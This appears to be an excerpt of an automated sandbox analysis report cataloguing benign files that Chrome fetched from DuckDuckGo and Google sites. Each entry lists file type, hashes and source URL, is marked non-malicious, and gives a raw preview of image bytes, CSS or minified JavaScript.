                                                                                                                                                            Preview:.PNG........IHDR.............Q..U....sBIT.....O... .IDATx..y...u'.^.w.}uu.}.LOO.=..@.$H.$@.Z..v%.Z...7...m......C!oX.:BZ.LQ.IQ$ES...A.<p.f0...=}wWU.}.G...YU].]}L.....8...........HD.c.1...4W..s..B8.....P.u...v.G....u...\GJ..M....@@..y...I..s..mw..a...$m.U.3..l26...X5E....B"...o...."C.R....D.q\@.....t..........m.0.".H..0..=..c.2]...ek....b.5r..v.....:..4...L.5......0...o...9.B.g'""BD]o.wi..R..-RJ".1D!%c.1.DRJ@ `.ADr%.9...uo....k..4..J./..._.6..y9..=S..~..g">.}.w?...=W/...o...N.m..Z./|.?^.........-........7p..S....b...W..n-..5.....wl8..O...)W...t........P......i.....D..r.J.T......w...*..O..?H.......u......?.t...~..{....o~.._{.j.........Mp..o..oV.......h:V.... -.....ON.v...|.s.&..>..v..jv............^...^Z.........._..5....'.............w.">u...>.......WO...../..o,....>......g..|.._.,..Rw......~.....R...z..?u..~.PZ...{...C" ...rw.........?.../|}bb.q......?.......&..\,.......j.z...Rf........;?2<.)Y~...xv=k%o...lp.&..6.$).......G.......4..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1195)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):208050
                                                                                                                                                            Entropy (8bit):5.527524198805295
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:HA2OL7g8WMo3NeigxLnrZyLAeE/s8vSz3gTSMzdGOCKqc6qmO+9maDhDWJPUBm1Z:ROL7Po3Ys0en8vP5GOCKaAGDWJPUBm1Z
                                                                                                                                                            MD5:B53067A92A1A2972E65ACBD28C1BD4B6
                                                                                                                                                            SHA1:73F76C08E36B3859382534FFD9F098A5A2AC8844
                                                                                                                                                            SHA-256:ECC876C51AF40D46138AFC49ED08FB18ECB4BB8550F6587E8DF0C3E71FA67448
                                                                                                                                                            SHA-512:CDBC28FA4A0A1FAC371C54B05614AFA8B6839FEF405AEB78880E8EF2D0106A28B4E59FB7BA1A7DCA99ABE1EA6EB52FED74B3AE6B61114EB757E972B5B96FE934
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.7LPvRDgzcqA.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo9wdgl3D0Cd5pn6O1gZXHwWDc_oTg/cb=gapi.loaded_1"
                                                                                                                                                            Preview:gapi.loaded_1(function(_){var window=this;._.zh=(window.gapi||{}).load;._.Lo=_.kf(_.vf,"rw",_.lf());.var Mo=function(a,b){(a=_.Lo[a])&&a.state<b&&(a.state=b)};var No=function(a){a=(a=_.Lo[a])?a.oid:void 0;if(a){var b=_.gf.getElementById(a);b&&b.parentNode.removeChild(b);delete _.Lo[a];No(a)}};_.Oo=function(a){a=a.container;typeof a==="string"&&(a=document.getElementById(a));return a};_.Po=function(a){var b=a.clientWidth;return"position:absolute;top:-10000px;width:"+(b?b+"px":a.style.width||"300px")+";margin:0px;border-style:none;"};._.Qo=function(a,b){var c={},d=a.yc(),e=b&&b.width,f=b&&b.height,h=b&&b.verticalAlign;h&&(c.verticalAlign=h);e||(e=d.width||a.width);f||(f=d.height||a.height);d.width=c.width=e;d.height=c.height=f;d=a.getIframeEl();e=a.getId();Mo(e,2);a:{e=a.getSiteEl();c=c||{};if(_.vf.oa){var k=d.id;if(k){f=(f=_.Lo[k])?f.state:void 0;if(f===1||f===4)break a;No(k)}}(f=e.nextSibling)&&f.dataset&&f.dataset.gapistub&&(e.parentNode.removeChild(f),e.style.cssText="");f=c.width;h=
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x297, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):6185
                                                                                                                                                            Entropy (8bit):7.582777569461185
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:PEC8Eorxe+OE0Y5iMLzHehxFoHo/9xKjYQfSIhB1+3KifO+NzL8kzU:PEEWxerxMfGIu9IkQfSIhBcFO+N/8kQ
                                                                                                                                                            MD5:E76C3A2535DEE5272F965A87DE405761
                                                                                                                                                            SHA1:2FC767D9F0A652F3452C0F1945A7B9052026357E
                                                                                                                                                            SHA-256:4EF2F92020B034E12F3C3A3D7A441FE0C9AA72EB27FBDCEDDA18114873E70CFA
                                                                                                                                                            SHA-512:83E98555272A1838E30C9DD9FD42AC51F008B6E6CDF1BCBC930FA12A89697C6BD9E8C869A706EF5F292463901F77BE316D0292135AEF7B0B5C2295605C7CDE67
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/download-bg-sm.jpg
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................).d...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(....+..#.Q.Q.G...af&.E...7...~!f.........|.7.z......J..9Cp...9D..K..._0.....+....|...... ...bS.....p...)].Q..L.QE....#.~ts[.Y...P.~....t.1..K.e.....z....a.....bl&.F...w.+y.(.....7.Z4.!2}M.C..s.f.o!.2=E+..a...C..;1.......X.....Z......>R.o.`&..E....K.....q.u.>Q7.Z/.;!....Z.....>_!7.Z...Af&..J....X...e$...i=...}]....J.7.~..H._1.Lv...P.#.O.;....)E...5.w.r....>..c.bn4.>Q
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (29443), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):29443
                                                                                                                                                            Entropy (8bit):5.152950343615504
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:PbDT7P53jhukgUjumh4HHg4RFh1tbwEE936aU/ewTqEp7hHitIhwXl:zP7R3jX4RF/tbwvXxl
                                                                                                                                                            MD5:8C76726B09F9FA5BC37C032941310DD2
                                                                                                                                                            SHA1:02672ED181247182EBDC6ACE6B09BF451E8FA817
                                                                                                                                                            SHA-256:A7F2A5726E8771FE9C791184C2310A71F84AA0A9450EB329A9A2584B2DF9FC17
                                                                                                                                                            SHA-512:43C2274402008B412827FE197681E9FEA4ECDC10CAD45EF4D9B78FBA320AF5B982A9A8B4B8D0DEC77771A78B90AE316B1EB7E8753764C3EDEA1F92ECF8D4DC79
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.homepage-cta-section_searchSection__LI0VV{text-align:center;max-width:var(--search-section-max-width);margin:0 auto;padding:0}.homepage-cta-section_searchSection__LI0VV .homepage-cta-section_logo__8ut95{margin:14px auto var(--sp-10)}.homepage-cta-section_heroImage__TfXka{width:344px;height:auto;flex-shrink:0}@media screen and (max-width:800px){.homepage-cta-section_heroImage__TfXka{display:none}}.homepage-cta-section_ctaSection__o_ioD{text-align:center;padding:var(--sp-16) 0;margin:0;color:var(--theme-text-home)}.homepage-cta-section_ctaSection__o_ioD .homepage-cta-section_ctaBtnWrap__6RBUB{display:flex;justify-content:center;align-items:center;margin:var(--sp-8) 0 var(--sp-3);-moz-column-gap:var(--sp-4);column-gap:var(--sp-4);row-gap:var(--sp-3)}@media screen and (max-width:800px){.homepage-cta-section_ctaSection__o_ioD .homepage-cta-section_ctaBtnWrap__6RBUB{flex-direction:column}}.homepage-cta-section_ctaSection__o_ioD .homepage-cta-section_ctaBtnWrap__6RBUB .homepage-cta-section_c
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):82385
                                                                                                                                                            Entropy (8bit):5.208180750396057
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:YkyxiGyw9EbbCxoWp5uQAaM+jGS8oSfUVAac2QmSdz58gUMO:Dq+tQAaBjG36VAac98gG
                                                                                                                                                            MD5:BA03F713C22AFA92B6A844B1F16BC008
                                                                                                                                                            SHA1:B0491936F8A924F6CCD31024799D8E16C82A95E1
                                                                                                                                                            SHA-256:99CBF6DB4280B2D0301807BFDB93BA7F20EC10636A8BA899A2D8FF09C89AB60B
                                                                                                                                                            SHA-512:12AAE12D5278C60744D18CDD4908AFE0223DA5ED3E85E2474D89AB0C3628D89D072AA2E02FA20C32446F2617E75B81A5A99809D2FE2A819F167DEBB186404A8A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/css/7cfb7e019667ac45.css
                                                                                                                                                            Preview:.center_root__Uf1xM{box-sizing:content-box;max-width:100%;margin-left:auto;margin-right:auto;padding-left:var(--center-gutter);padding-right:var(--center-gutter)}@supports(max-inline-size:var(--center-measure )){.center_root__Uf1xM{max-width:var(--center-measure);max-inline-size:var(--center-measure)}}@supports(margin-inline:auto){.center_root__Uf1xM{margin-left:0;margin-right:0;margin-inline:auto}}@supports(padding-inline-start:var(--center-gutter )) and (padding-inline-end:var(--center-gutter )){.center_root__Uf1xM{padding-left:0;padding-right:0;padding-inline-start:var(--center-gutter);padding-inline-end:var(--center-gutter)}}.center_andText__ejUnC{text-align:center}.center_intrinsic__mk_Ab{display:flex;flex-direction:column;align-items:center}.center_gutters__Ot5Wk{--center-gutter:var(--sp-4)}.card_card__afbUo{padding:var(--sp-4)}.card_card__afbUo.card_dismissable__j5ZTy{position:relative}.card_card__afbUo.card_elevation0__xXwlZ{box-shadow:var(--elevation-0)}.card_card__afbUo.card_
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 100x297, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1577
                                                                                                                                                            Entropy (8bit):6.972891543192576
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:3c1spgC5OwVaJRP+bxV5oR9IFn/ZuB/vZG5W8GzxIC2qnNwN9s:3iWp5OwV6+FPoR96n/ZABv8GzdlOk
                                                                                                                                                            MD5:A13986781C5A7620F21C5847CE44D284
                                                                                                                                                            SHA1:927D96F1DC04C21CD995CF60E349D57D56AE237E
                                                                                                                                                            SHA-256:454A6A76D1A76D8B3EA210EE21093A538E4A0B8B542D181E1864699EFBE445D0
                                                                                                                                                            SHA-512:5D1B265BCB1A70BBDEC7E851941694054BA61A3EA22375B134C548C12D606A0CEAA5B3CDB6535EF661919CE15864FBBB549F4E911A59BF38FF6F0DC797E98FAC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......).d.................................................................................H..bZ...J...A(D#gM8%...Z.".....e..Z.B!.:....JA)....N...e..-..D(.ms.0JJ)..E...|.s.....@$j..fK...K..!MWm.'Y.RR%.R.(.m.%%..KJA..b...*A))....]..*A.e.R VF..d...iH%.I..y..H%.PH...g.E R)BX.#...H.RT........h..B!+;w.(.),.D$u.%.....R..r.E(@...t.B...P.H.|..-.)...........P"(.....j. ......"(..H..""".$...."%... .. T.H.3P,Q....f....b.4...,D2B"c..,DC..H.@.X....Lt.H.....1.......BFz..,.%..'................................w...............................?.w...............................?.w...............................?.w.......................0.P..@p........?!.0..^.l,..2..8.f"...............e..R.R....Kg.~^.7]..u..i..K0.....R..p...v.G..b.m..>B.....C.4.B[/.+......S.[.e.-T!.B.6.0...X.m=!U]...*2..'..J?...#...m-+....v.RO.@0B...Ja.)-#..&...4.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 640 x 410, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):76515
                                                                                                                                                            Entropy (8bit):7.963753178054859
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:8WdtQMMGe5V5U53k564NWcj6IG4+hGQIByj2JHo/GriqnQn88qW:EJ5V5R56ILQC//Qn
                                                                                                                                                            MD5:52E22B7A90DD2A296ABEEB984436EBD0
                                                                                                                                                            SHA1:3B6B84A2E5CA3AC232305BD7937D9CC6E6165E46
                                                                                                                                                            SHA-256:FFA18F7FF949E8628C5500813100A6F151D7680CE194EC8D600A54740F821892
                                                                                                                                                            SHA-512:EEE0B8BFBD118D1C643A61A7B14B1D1FFFEBECB0CA9BBE49C99B86DBF0CF57831A68C2E34C541A0A6705D1E68CDFFF4F605C1B7C3A08E63427898BC57F12B358
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/windows/install-step-03-welcome.png
                                                                                                                                                            Preview:.PNG........IHDR..............h.C....pHYs.................sRGB.........gAMA......a...*xIDATx.....d.U%..g.....1eDdFf.R9!..).B..H...B......_._T...U...$5.....ZE.E.V7...).!.Z@.P1H.)..D9+2f.....'.^.}...........X.f.&...}..{.}.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0....A@G.a........V`.n.o...o..\k.F.!~>n......9....s...9N|y.s.s.u=..w..kR....../......y......:...{...s...[k.Z...y.{n....s.?&.........+..P.=.._.o......._.{.7.8.<...G.x..z..Q.#..:<.N.......7hE...$*.Wl0...z._...I..6z.j.........u.....O.:E.?.3X.k...pj\....[...j......{..........?[.Xu..~.....W.!.}.p.z...o_u....[..H..:^..?.}..}..........M......{..?k.....=
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (29443), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):29443
                                                                                                                                                            Entropy (8bit):5.152950343615504
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:PbDT7P53jhukgUjumh4HHg4RFh1tbwEE936aU/ewTqEp7hHitIhwXl:zP7R3jX4RF/tbwvXxl
                                                                                                                                                            MD5:8C76726B09F9FA5BC37C032941310DD2
                                                                                                                                                            SHA1:02672ED181247182EBDC6ACE6B09BF451E8FA817
                                                                                                                                                            SHA-256:A7F2A5726E8771FE9C791184C2310A71F84AA0A9450EB329A9A2584B2DF9FC17
                                                                                                                                                            SHA-512:43C2274402008B412827FE197681E9FEA4ECDC10CAD45EF4D9B78FBA320AF5B982A9A8B4B8D0DEC77771A78B90AE316B1EB7E8753764C3EDEA1F92ECF8D4DC79
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/css/e129782d9e96eedb.css
                                                                                                                                                            Preview:.homepage-cta-section_searchSection__LI0VV{text-align:center;max-width:var(--search-section-max-width);margin:0 auto;padding:0}.homepage-cta-section_searchSection__LI0VV .homepage-cta-section_logo__8ut95{margin:14px auto var(--sp-10)}.homepage-cta-section_heroImage__TfXka{width:344px;height:auto;flex-shrink:0}@media screen and (max-width:800px){.homepage-cta-section_heroImage__TfXka{display:none}}.homepage-cta-section_ctaSection__o_ioD{text-align:center;padding:var(--sp-16) 0;margin:0;color:var(--theme-text-home)}.homepage-cta-section_ctaSection__o_ioD .homepage-cta-section_ctaBtnWrap__6RBUB{display:flex;justify-content:center;align-items:center;margin:var(--sp-8) 0 var(--sp-3);-moz-column-gap:var(--sp-4);column-gap:var(--sp-4);row-gap:var(--sp-3)}@media screen and (max-width:800px){.homepage-cta-section_ctaSection__o_ioD .homepage-cta-section_ctaBtnWrap__6RBUB{flex-direction:column}}.homepage-cta-section_ctaSection__o_ioD .homepage-cta-section_ctaBtnWrap__6RBUB .homepage-cta-section_c
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (31614), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):31614
                                                                                                                                                            Entropy (8bit):5.48177450486598
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:PxfPUgGhRciMID4Fq+bTHJjUrtYgFiFz3EZWOmYw3Q78X1UqsZniipvPa495WKJs:5fPl8ciERUrtYgFiL3Q741UqucQs
                                                                                                                                                            MD5:6F6243148C8BA8CBA1BF4063285B0BC2
                                                                                                                                                            SHA1:61BACE511DD56413A02CEB388F499AB2ACE263A1
                                                                                                                                                            SHA-256:574A9644DF5A5B88BF448DB5D6EC7A4E8AAE7EBFDC18462A1511ED2C5DCBBCC1
                                                                                                                                                            SHA-512:1D204AA18A9D0D3993723D67E33FE0FC52851AD8CE0CA1EDE2265BC387CFC95A4A3CCFE9336CBBC661F555D7637768300734E45FF8FCADF5BA345F47D68F2701
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/49706-3be19373f731bb13.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[49706],{80912:function(e,n,r){"use strict";var o=r(59499),t=r(4730),i=r(67294),s=r(74956),a=r.n(s),c=r(94184),l=r.n(c),d=r(43165),u=r(24446),h=r(85893),_=["as","className","variant","appearance","elevation","size","once","onClick","children"];function p(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);n&&(o=o.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,o)}return r}function g(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?p(Object(r),!0).forEach((function(n){(0,o.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):p(Object(r)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}))}return e}var f=(0,d.j)((function(e,n){var r=e.as,s=e.className,c=e.variant,d=e.appearance,p=e.elevation,f=e.size,v=void 0===f?"m
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1937
                                                                                                                                                            Entropy (8bit):4.940379550034767
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:TMClHa9kW9YPGZ4vry8ncK3Q7q/WTM0xvV2brUEzf7nv4ezLgQH5:gClMkVvrAVq/WTP2bgEHnvt3Z
                                                                                                                                                            MD5:50C83D629F91A82D32C106BFE79084F3
                                                                                                                                                            SHA1:8AB2212C4AE249DB2E80E689719FFBEBACA63547
                                                                                                                                                            SHA-256:082A8B1BC16816B2EE1A57A95786216F499FA5ED00CC96F404EFED5C4E4E34C0
                                                                                                                                                            SHA-512:A30D28F002EBE190BC9DB5FF141571C482D5C71A46FB0861D6706A2D96B2F0A0811FD35A976D7E0B70F9DAF3F1471A5D6029B4D4BC71E4EA5CDD85A1346390DC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<svg width="375" height="359" viewBox="0 0 375 359" fill="none" xmlns="http://www.w3.org/2000/svg">.<mask id="mask0_2_7151" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="0" y="0" width="373" height="346">.<rect width="372.627" height="345.597" fill="#C4C4C4"/>.</mask>.<g mask="url(#mask0_2_7151)">.<path opacity="0.5" fill-rule="evenodd" clip-rule="evenodd" d="M158.555 227.495L181.644 259.69H183.43V249.57H197.605V216.457H205.705V199.9L221.909 188.858V205.419H227.984V249.57H240.135V236.327H258.36V208.178L266.464 202.659L274.564 208.178V230.254H278.614V186.098L302.915 202.659V214.347H313.04V174.574L321.144 169.055L329.244 174.574V229.445H335.319V212.67H357.595V238.532H361.645V197.69H367.72V179.476H374.608L385.949 164.022L397.29 179.476H404.175V197.69H410.25V213.697H416.325V186.098L424.425 180.579L432.526 186.098V213.697H436.579V253.986H444.679V213.697H448.729L458.855 199.9L468.98 213.697H473.03V241.292H485.181V197.136L501.384 208.178V221.976H509.485V241.292L519.61 227.495L542.698
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 500x434, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):7708
                                                                                                                                                            Entropy (8bit):7.609964143514899
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:6PnFK+JLbGw8XhQw6v5jRS9eLtSo4Ur3ff7BSGnUGVeH3pCbjIDLRazu:6Y+JLLIhGjtSo5jf7IGFwXpgu
                                                                                                                                                            MD5:0B070C78FA5B50214EA4CB54C9765483
                                                                                                                                                            SHA1:257A72BC6676C3C718B4C46116BC6151510757BB
                                                                                                                                                            SHA-256:C76B1B5CE023817F6EDF2B0AE6D79FE07DDC6623E5810EB3E17056E29FC19CD3
                                                                                                                                                            SHA-512:C7E62A2CE4B274666110D27C75EF8A9789E7328D245D499DE406EE25947BAC4B8B10771275FE37C7042902A2E73C52439D461B9B37AC8BF5BBA42D3BFCCB71A0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........................................................................................."....*. ....B5"J....M..*..%*2...D....... .,.,....$.J.."..D....V...e.V%..... .....P.d... ..(.B$F.t(..4"&....2.+..+E....'.q...,..+(....H,H...F.SCI.B"2.MB.#++..2.D.@R.e<.$U!R.&h.2.d.. ..$BBh...iSBj.P..aV42....+..*E.)....J....3B....@(H..HDi]..U4...BiX....]J.+...2..@.O.I..XQfP.3Bf......!!..t).M..M...&.ecJ..Xe.m+...P...t.T.......A3Y...H..."F..&.BiSC.....u....R..W&ZV%.(....+....3aY.6...Y.....b.DkBhm..Biu...jV]C..e.Z..eb.)h..9.%BT!Y...6f.3Y......!..DMR&.F.SF.]..P....R...f.....A..r.I.,.S(Y.3E.L.. .....B#Z.CI.B.4&.F.t2.V]K....Yu..Xe.R((..=3...Y.B.Y.6e...d...HHi.....]..4..K.e..Yj]K..7R.Z.hT.....+.(...6f.fP.&l....J.HDi4#Z.U.]Biu..K.e....e.k..u..+D...7L.Aafl,....Y..e......"4.......cK.tj]C.......n...a)h...^...3aafk7%f..&l.....
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13743
                                                                                                                                                            Entropy (8bit):7.976554063597098
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:HEc8Pf/gf2kKJV4TIe4kfIr6NPz2688RXfQuaT9o:HEJgmb4ukKuPz268wXfQuB
                                                                                                                                                            MD5:2F5AD5ADECF0E139755FBD2D821979B9
                                                                                                                                                            SHA1:7D865EF92D718A865891FEB537034CE4BB5C3C2E
                                                                                                                                                            SHA-256:0FCE1FE1D859A94618124FDDD15BB069EB0639366039CB1FCBD5992D2FAAA0BA
                                                                                                                                                            SHA-512:8940A4C9944DA461C1C46A2DF5B5165D7A8C16BF3DD542A1F4A33B7E50A5675962F631356DB21AE3BD2379CBC095333825BE68AECF1000E4353D377EACDB4419
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a...5DIDATx..}y...u.9...j1..k..G#7.,.*..d.p....-.....u].".!......C.nU.....:mI...BD.A+..9.b'Nl.Z,Y..GI..py.9..wO.=..#..3C.+../.l.........V.j[m.m.....V.j[m...!......M.N...f~.0.!NRl&:.S......M.R:..?1uD..c/......>P...]..yy.'.....k?......?....#..D.).].........NQ..'..Qf....9..... {..{...q.O..+.).X...O.0.~>....[|."%.A..L..^L0g....i..*#........,G..L....|..P.5........=....WP... Kz<1.|R.(..l..Q.f...2.P......X#.K=...3F..5..k....O.u.......,upG.xE0....SO.h.!.".J\&l....$.......fc....V..Q.$3...G....7+z~a....@.........,\..f....yS.p...O.L.......L8;M.A.DT...Y..V..e.).D../.Vp3....j...h.!........A..0...?..\f.d..'.M'rlO.7I......h.D<3S..........a..8.....`.w. L.~.;....E.X.Of$Y.|.....Bf.|L..@...n...I...`..S.nM..Bh.eOn..`...........(c.{..5h.N.....2...U..M.*.LP.x&.H....3.e=.7.Mo..3....\#\....]8>.5u......U...k.6&..p...c.>T.C%..F.-l X..b.n.d..(.P.Mj..1o.=.....C.0j..T.d..3......1..m.].
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):476
                                                                                                                                                            Entropy (8bit):5.25008776645794
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:ky5UFpnTkQ90O4KaemqCRiOgy12eXLl0dkbRNced0:knXnTkQ90j3qEuykeaercn
                                                                                                                                                            MD5:E00A6460BE4C555A04EA7DB4632CF53C
                                                                                                                                                            SHA1:0748AC409269753B3840AA468FFAE671AD01C7B6
                                                                                                                                                            SHA-256:54880FBCA4496B8056EAA2B1ACEB05A5FE829C16CD48AF35537C41AA232C18B7
                                                                                                                                                            SHA-512:4B81E629EDFECD2A9ABA34C747D033672DEB221CA8E98A737B5CD383A055C258542DC5CCFB2055B1F35970E77FC63E21E7077DB666FE0A4762A2EC1AB71A5AA0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-chrome-webstore/_/js/k=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.en_US.yIPKtUt8CNQ.es5.O/ck=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.GtGb1vgdaaY.L.B1.O/am=SAcGA2YB/d=1/exm=A1yn5d,A7fCU,AWpPDd,BBI74,BVgquf,CfLNpd,DNlSjf,ECBKud,EEDORb,EFQ78c,FdMhB,Fu7Bjd,HsQQib,IZT63,JNoxi,KUM7Z,KfQkxf,L1AAkb,LBaJxb,LEikZe,LcrBLd,M0x0ie,MH0hJe,MI6k7c,MT4Hub,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O626Fe,O6y8ed,OTA3Ae,OhgRI,OmgaI,P6sQOc,PIVayb,PrPYRd,QIhFr,QVysJe,QvLWAb,Qy2cOb,R6rk4,RMhBfe,RiINWe,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,UkbOSe,Ulmmrd,V3dDOb,V9amgb,VBl5Ff,XVMNvd,Xi0ENb,YA1iG,YYmHzb,Z5uLle,ZDZcre,ZfAoz,ZvHseb,ZwDk9d,_b,_tp,aW3pY,aurFic,bZ0mod,byfTOb,cephkf,dsBBae,duFQFc,e5qFLc,ebZ3mb,fKUV3e,gIl2M,gychg,h4ilFc,hKSk3e,hc6Ubd,i8oNZb,kBpGk,kWgXee,kjKdXe,lazG7b,ld80Uc,lsjVmc,lwddkf,mI3LFb,mUxuKd,mdR7q,n73qwf,o2G9me,ovKuLd,p8L0ob,pjICDe,pw70Gc,q0xTif,qv5bsb,ri2s0b,rm99Nc,s39S4,sI9bWe,sOXFj,sQ8PT,tw4SJc,w9C4d,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,zKiH5d,zbML3c,zr1jrb/excm=_b,_tp,itemdetailview/ed=1/wt=2/ujg=1/rs=AEP720Jfe38t-OWhOSrlVq2pOwWCRGJ40A/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:YA1iG;xqZiqf:BBI74;yEQyxe:p8L0ob;yxTchf:KUM7Z;zxnPse:duFQFc/m=db7dHd"
